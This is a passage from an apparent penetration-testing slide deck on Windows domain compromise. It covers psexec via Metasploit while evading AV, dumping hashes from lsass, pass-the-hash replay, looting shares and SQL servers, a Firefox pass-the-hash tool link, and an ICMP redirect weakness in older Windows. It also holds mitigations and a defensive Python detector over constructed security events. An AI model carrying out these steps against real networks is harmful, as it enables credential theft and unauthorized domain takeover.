• ^ Metasploit module auxiliary/admin/smb/psexec_command also works. Do not use windows/smb/psexec as this uploads an exe to the box and will trigger AV.
• Log in to the box running the domain admin process – dump the hash or read it from lsass as plain text.
• Replay the hash or log in as domain admin over RDP etc.
• Game over.
  – Pro Stealth tip : Once you get a domain admin shell DO NOT CREATE a new domain admin user.
    • This will trigger Ops, as a lot of organisations are alerted if a new domain administrator is created.

27. Looting
• Go after SQL servers – you should have a list of these from your scans
• Shares – Yes, people still store heaps of confidential stuff unencrypted in shares
• Have you guys seen Firefox PTH ? – All ur OWA and sharepoint r belong 2 us !
• Metasploit – post exploitation modules – store loot in the MSF DB for grepping later.

28. Firefox PTH
• DEMO
• https://code.google.com/p/passing-the-hash/downloads/list

29. Mitigations
• You can't really stop a determined attacker
• There are just way too many ways you could get hacked
• Best bet is to detect
• Check anomalies – New user creation (DA etc), Local admin logons, AV pickups etc
• User education
• Google's new n/w architecture – All zones are untrusted (Not a bad idea eh ?)
• Obvious old school protections should still apply – Patching, strong passwords, access controls etc
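Slide 26's stealth tip and the Mitigations slide describe the same thing from opposite sides: Ops can alert on a new Domain Admin, on fresh accounts, and on one source logging on as the local Administrator all over the estate (the hash spray from slides 25/26). This added example (not from the talk) runs those three checks over constructed Windows Security events; the event IDs 4720 (user created), 4728 (member added to a security-enabled global group) and 4624 (successful logon) are the real ones, while the simplified field names and the events themselves are constructed.

```python
"""Detection side of slides 26/29: flag new privileged members, new accounts and
a local Administrator logon spray across constructed Windows Security events."""
from collections import defaultdict

USER_CREATED, GROUP_MEMBER_ADDED, LOGON = 4720, 4728, 4624   # real Security event IDs
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins"}
LOGON_NETWORK = 3            # LogonType 3 is what SMB/psexec-style access produces
SPRAY_HOSTS = 3              # one source hitting this many hosts as local Administrator

# Constructed sample events (not real logs). Keys are simplified, not Windows EventData names.
EVENTS = [
    {"id": 4624, "host": "WS01", "user": "alice", "logon_type": 2, "src": "-"},
    {"id": 4624, "host": "WS02", "user": "Administrator", "logon_type": 3, "src": "10.0.0.50"},
    {"id": 4624, "host": "WS03", "user": "Administrator", "logon_type": 3, "src": "10.0.0.50"},
    {"id": 4624, "host": "SQL01", "user": "Administrator", "logon_type": 3, "src": "10.0.0.50"},
    {"id": 4624, "host": "FS01", "user": "Administrator", "logon_type": 3, "src": "10.0.0.7"},
    {"id": 4720, "host": "DC01", "user": "svc_backup2", "actor": "bob"},
    {"id": 4728, "host": "DC01", "member": "svc_backup2", "group": "Domain Admins", "actor": "bob"},
    {"id": 4728, "host": "DC01", "member": "carol", "group": "Helpdesk", "actor": "bob"},
]

def new_privileged_members(events):
    """4728 into a privileged group: the thing the stealth tip says will wake Ops up."""
    return [(e["member"], e["group"], e["actor"]) for e in events
            if e["id"] == GROUP_MEMBER_ADDED and e["group"] in PRIVILEGED_GROUPS]

def new_accounts(events):
    """4720: any account creation is worth a look, doubly so right before a 4728."""
    return [(e["user"], e["actor"]) for e in events if e["id"] == USER_CREATED]

def admin_logon_spray(events, threshold=SPRAY_HOSTS):
    """One source address logging on over the network as local Administrator to many
    hosts looks like a shared local-admin hash being sprayed (slides 25/26)."""
    hosts_by_src = defaultdict(set)
    for e in events:
        if (e["id"] == LOGON and e["logon_type"] == LOGON_NETWORK
                and e["user"].lower() == "administrator"):
            hosts_by_src[e["src"]].add(e["host"])
    return {src: sorted(h) for src, h in hosts_by_src.items() if len(h) >= threshold}

def detect(events):
    """Run all three checks; each value is empty when there is nothing to report."""
    return {"privileged_adds": new_privileged_members(events),
            "new_accounts": new_accounts(events),
            "admin_spray": admin_logon_spray(events)}

if __name__ == "__main__":
    for name, hits in detect(EVENTS).items():
        print(name, hits)
```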
30. Testing "Pro" tips
• Don't leave any accounts you create on the customer's network – delete everything (Finding a DA account left by a pen-tester in the last engagement = fail)
• Bruteforce wisely – locking out an important service will not go down well with a customer (Bump down threads = increase stealth)
• Don't disable AV – Intelligent Ops are alerted if AV dies
• Wipe your VM after every pen-test – A clean slate to work on is so much better
• Snapshotting to have all your tools set up and then reset also works
• Script for linux is your best friend
• Notes – always good for other eyes trying to read and understand what you did (doesn't even have to be fancy – Vi or notepad works)
• Videos for complex attacks – I'd highly recommend it (mind you this is gonna eat some disk space and sending this to a client might be difficult)

31. Music (Ignore slide if you don't listen to music)
• Meshuggah, Lamb of God and Tool – when ur feeling effing awesome and pwning like a baws
• Trying really hard for a breakthrough or fighting a problem – Really fast techno or dubstep
• When you lose it and wanna break your laptop – Vitamin String Quartet (trust me this works)

32. That's it
• Things I want to work on (any help will earn beers and respect):
  – Write more ducky scripts (hopefully run faster and grab more stuff, reverse shell etc)
  – Write post exploit modules (which can loot more efficiently)
  – Set up a Pi that can do all this over 3/4g to be sent to the client so I can watch BSG and sip beer.
  – Hope this helped. Google for anything that I may have not provided a link for or explained in detail
Blog: http://psychsec.wordpress.com/

Editor's Notes

1. Windows <= 5.2 domain members (XP, Windows Server 2003 and above) have ICMP Redirect enabled by default. This functionality can be used to remotely add (with no authentication required) a new route for a given host. So basically, anything older than Windows Vista / Server 2008 is vulnerable. You just send it an ICMP redirect, and shiz gets redirected.